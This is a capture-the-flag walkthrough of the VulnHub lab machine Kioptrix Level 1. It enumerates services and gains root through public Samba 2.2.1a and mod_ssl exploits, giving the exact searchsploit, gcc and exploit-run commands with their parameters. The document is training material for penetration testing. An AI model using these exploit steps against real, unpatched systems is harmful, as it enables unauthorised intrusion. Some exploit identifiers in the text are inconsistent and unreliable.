Kioptrix: Level 1 – Walkthrough
Kioptrix: Level 1 surfaced on VulnHub on February 17th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root’s email.
For the attacking machine, I will be using Kali 2017.1.
Once booted, this is what the victim machine will look like:
We start the attack by finding the IP of the victim machine by using the netdiscover command:
Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:
The scan shows us that the following ports are open:
- Port 22 – Running OpenSSH
- Port 80 – Running Apache Web server
- Port 111 – Running RPC
- Port 139 – Running Samba
- Port 443 – Running Apache. We server over ssl
- Port 1024 – Running RPC
Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:
Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it:
$ enum4linux -a 172.16.92.138 > output.txt
This gives us a lot of information including the Samba version is being used, 2.2.1a. Upon doing a simple exploit, I see that a Remote Code Execution exploit is available:
$ searchsploit samba 2.2
I copy the exploit to the root directory as exploit.c:
$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c
then I compile the exploit via gcc:
$ gcc -o samba exploit.c
I am given the final file proper permissions:
$ chmod 755 samba
Let’s dry run the exploit and see what all parameters are required:
Okay then, I think we are ready to use this:
$ ./samba -b 0 -c 172.16.92.133 172.16.92.138
And we are in with root privileges! Now we need to find the email.
I found the email under /var/mail:
While playing around it with more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):
$ use exploit/linux/samba/trans2open
Another way of getting into the machine was via exploit mod_ssl (CVE 2002 – 0082). I found its exploit at https://www.exploit-db.com/exploits/764/
$ gcc -o OpenFuck 746.c -lcrypto
Note: Since the exploit is old, you can update it by following the following tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will require libssl and libssl-dev before you compile the exploit.
$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40
We've encountered a new and totally unexpected error.
Get instant boot camp pricing
A new tab for your requested boot camp pricing will open in 5 seconds. If it doesn't open, click here.